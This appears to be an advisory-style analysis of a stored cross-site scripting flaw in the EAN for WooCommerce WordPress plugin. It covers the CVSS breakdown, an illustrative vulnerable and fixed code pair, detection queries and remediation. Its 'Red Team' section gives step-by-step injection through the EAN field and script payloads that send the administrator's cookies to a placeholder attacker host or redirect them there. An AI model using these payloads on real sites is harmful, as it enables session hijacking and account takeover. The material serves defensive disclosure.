CVE-2025-48249
Executive Summary
CVE-2025-48249 is a Stored Cross-Site Scripting (XSS) vulnerability in the WPFactory EAN for WooCommerce plugin for WordPress, affecting versions up to and including 5.4.6. This vulnerability allows an authenticated attacker with contributor-level access or higher to inject malicious scripts into web pages generated by the plugin. When an administrator or other user views the affected page, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or defacement. The vulnerability stems from improper neutralization of input during web page generation. As a WordPress plugin issue, the attack surface is limited to sites running the vulnerable plugin, and exploitation requires authenticated access. No public proof-of-concept or exploit code is currently available, and no official patch has been released.

Supply Chain & Package Security
This vulnerability affects the WordPress plugin ecosystem. The plugin is distributed via the official WordPress plugin repository and can be installed directly from the WordPress admin dashboard. Users should verify the integrity of the plugin by checking its checksum against the official repository. No known malicious packages have been reported, but the lack of a patch increases supply chain risk for sites that continue to use the vulnerable version.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Base Score: 6.5 (Medium)
- Attack Vector (AV): Network (N) – The vulnerability can be exploited remotely.
- Attack Complexity (AC): Low (L) – No special conditions are required.
- Privileges Required (PR): Low (L) – An attacker needs contributor-level access to the WordPress site.
- User Interaction (UI): Required (R) – The victim must view the compromised page.
- Scope (S): Changed (C) – The impact extends beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify data.
- Availability (A): Low (L) – Limited impact on availability.
Threat Level: Medium. While the CVSS score is moderate, the potential for stored XSS in a widely used e-commerce plugin could lead to significant damage if exploited in a targeted attack.
Deep Dive & Mechanics
The vulnerability exists in the EAN for WooCommerce plugin, which adds European Article Number (EAN) barcode fields to WooCommerce products. The plugin fails to properly sanitize user-supplied input before storing it in the database and later rendering it in the admin or frontend interface. Specifically, the plugin does not escape or validate the EAN code field, allowing an attacker to inject arbitrary HTML and JavaScript.
Attack Flow:
- An attacker with contributor-level access (or higher) logs into the WordPress admin panel.
- The attacker navigates to a product edit page and inserts a malicious payload into the EAN field, e.g.,
<script>alert('XSS')</script>. - The plugin stores the payload in the WordPress database without sanitization.
- When an administrator or other user views the product list or product detail page, the plugin retrieves and renders the payload without escaping.
- The victim's browser executes the malicious script, which can steal cookies, redirect to phishing sites, or perform actions on behalf of the victim.
The root cause is the use of functions like echo $ean_code; instead of echo esc_html( $ean_code ); in the plugin's template files.
Vulnerable vs. Patched Code
Vulnerable Code (version <= 5.4.6):
// In a template file, e.g., admin/product-list.php
echo $ean_code;
Patched Code (hypothetical fix):
// Properly escape output
echo esc_html( $ean_code );
The vulnerable code directly outputs the $ean_code variable without escaping, allowing XSS. The patched code uses WordPress's esc_html() function to encode special characters, preventing script injection.
Exploitation & Lab Setup
Red Team
Prerequisites:
- A WordPress site with the EAN for WooCommerce plugin version <= 5.4.6 installed and activated.
- A user account with at least contributor-level privileges.
Exploitation Steps:
- Log in to the WordPress admin panel as a contributor.
- Navigate to Products > Add New or edit an existing product.
- In the EAN field (usually under the Product Data metabox), enter the following payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the product.
- Wait for an administrator to view the product list or product detail page. The script will execute, sending the admin's cookies to the attacker's server.
Alternative Payloads:
- Session hijacking:
<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script> - Defacement:
<script>document.body.innerHTML='<h1>Hacked</h1>'</script>
Blue Team
Detection:
- Monitor WordPress admin logs for unusual product edits, especially by low-privileged users.
- Look for suspicious strings in the
postmetatable, specifically the_eanmeta key. - Use web application firewalls (WAF) to block common XSS payloads in POST requests.
Hunting:
- Query the database for stored XSS indicators:
SELECT * FROM wp_postmeta WHERE meta_key = '_ean' AND meta_value LIKE '%<script%'; - Review server access logs for requests containing
<script>tags in the EAN field.
Indicators of Compromise (IOCs)
File Indicators:
- Plugin file:
/wp-content/plugins/ean-for-woocommerce/ean-for-woocommerce.php - Template files containing unescaped output (e.g.,
admin/product-list.php)
- Plugin file:
Network Indicators:
- Outbound connections to attacker-controlled domains from the WordPress admin panel.
- HTTP requests containing
<script>tags in the EAN field.
Database Indicators:
- Rows in
wp_postmetawithmeta_key = '_ean'andmeta_valuecontaining<script>or other HTML/JavaScript.
- Rows in
Log Indicators:
- WordPress debug log entries showing unexpected output in product pages.
- Web server logs with
POSTrequests to/wp-admin/post.phpcontaining suspicious EAN values.

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patch is available. Navigate to Plugins > Installed Plugins and deactivate "EAN for WooCommerce".
- Remove stored payloads by querying the database:
DELETE FROM wp_postmeta WHERE meta_key = '_ean' AND meta_value LIKE '%<script%'; - Review user accounts and revoke contributor-level access for suspicious users.
Long-term Mitigation:
- Monitor the WPFactory website or WordPress plugin repository for an official patch.
- Implement a Web Application Firewall (WAF) with rules to block XSS payloads.
- Enforce the principle of least privilege for WordPress user roles.
- Regularly audit plugin code for unescaped output.
Workaround:
- If the plugin is critical, manually patch the vulnerable template files by adding
esc_html()around the$ean_codevariable.
